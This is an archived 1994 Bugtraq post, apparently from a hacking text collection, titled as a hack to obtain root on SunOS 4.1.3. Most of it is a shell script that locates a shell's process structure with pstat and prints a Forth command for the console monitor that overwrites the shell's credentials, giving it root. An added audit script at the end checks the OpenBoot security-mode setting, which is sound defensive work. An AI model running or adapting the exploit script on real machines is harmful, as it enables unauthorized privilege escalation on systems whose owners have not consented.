**************************************************************************
HACK: Use monitor on console to poke holes in memory & obtain root
System: Unix, Sun 4.1.3
Source: Bugtraq
**************************************************************************

#!/bin/sh -
# From: an100188@anon.penet.fi
# Subject: Breaking in from the monitor at the console
# Date: Fri, 27 May 1994 15:34:36 UTC
# To: bugtraq@crimelab.com
#
# Breaking into a machine, typically a workstation, by using the monitor
# at the console to poke values into memory has always been possible. I
# didn't realize how simple and unobtrusive it was before I saw this
# script. This one is for Suns, but the principle applies to any
# machine with a console monitor. On Sun4s there is some sort of
# "secure mode" that I presume lets you disable the monitor. It is
# possible to change the L1-A sequence to another pair of keys, but if
# you own /dev/console you can change it back. This obscurity may or
# may not be useful.
#
# This particular attack needs a way to run the script on the machine,
# typically in a shell. I presume there are other spots where you could
# tickle a machine that don't even require that. Physically secure
# consoles prevent this attack.
#
# Sigh.
#
# ----------------------------------------------------------------------------
#
# Subject: Re: Breaking in from the monitor at the console
# Date: Sat, 28 May 1994 10:15:52 UTC
# To: bugtraq@crimelab.com
#
# Oops, someone pointed out that the script was deleted by the anonymous
# mail signature-remover. Sorry about that. Here's the script:
#
#
#
# Program: fc-4.1.3
# Author: Anonymous
# Usage: fc-4.1.3 PID
#   PID is the PID of the shell you wish to give root to.
#
# Description:
#   Tell people how to give themselves root (on SunOS 4.1.3 machines)
#

# Give the program a known path
PATH="/bin:/usr/etc:/usr/ucb"
export PATH

if [ "$1x" = x ]; then
	cat - << EOF
Usage: $0 PID
	Where PID is the PID of the shell you want to give root to.
	Note - for csh the PID is stored in \$\$.
EOF
	exit 1
fi

# This is the start of the proc structure for a given PID.
procp=`pstat -u $1 | grep procp | cut -f2`

# This is really the only important information here.
# This number is the offset of the pointer to the cred structure
# in the proc structure.
ucred="4c"

cat - << EOF
On the console press L1-a; you should then see the following message:

Type 'go' to resume
ok

type the following at the 'ok' prompt:

b 2 do 0 $procp $ucred + l@ i + w! 2 +loop
go

Notes:
	* On some Sun keyboards the 'L1' key is labeled 'Stop'.
	* There is Emacs style line editing available at the 'ok' prompt.
EOF

exit 0
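The post mentions a Sun4 "secure mode" without naming it. On OpenBoot machines it is the NVRAM variable security-mode (values none, command and full), which the eeprom command reports as a line of the form "security-mode=none". The following audit helper is an added example written for this page, not part of the Bugtraq post: it classifies that line so a host inventory can flag consoles whose monitor still accepts arbitrary commands without a PROM password. The sample line it falls back to when no eeprom command is present is constructed.

```shell
#!/bin/sh
# Added example, not from the Bugtraq post. Classifies the OpenBoot
# security-mode setting as printed by `eeprom security-mode`.
# Assumed output format: a single line "security-mode=<none|command|full>".

# monitor_status LINE: echo "unprotected", "protected" or "unknown"
monitor_status() {
    case "$1" in
        security-mode=none)
            echo unprotected ;;
        security-mode=command|security-mode=full)
            echo protected ;;
        *)
            echo unknown ;;
    esac
}

# audit_line LINE: exit 0 when the monitor requires the PROM password,
# non-zero otherwise (so the function can drive an inventory script)
audit_line() {
    [ "$(monitor_status "$1")" = protected ]
}

# Use the real setting when the eeprom command exists; otherwise fall back
# to a constructed sample line so the script runs on any host.
if command -v eeprom >/dev/null 2>&1; then
    line=$(eeprom security-mode 2>/dev/null)
else
    line='security-mode=none'   # constructed sample, not a real host
fi

echo "$line -> $(monitor_status "$line")"
```

Treat "unprotected" as the finding that matters: with security-mode=none the sequence the post describes is available to anyone at the keyboard. In command mode only the bare boot and go commands are exempt from the password prompt, so memory writes at the ok prompt are refused; full mode additionally prompts on every boot.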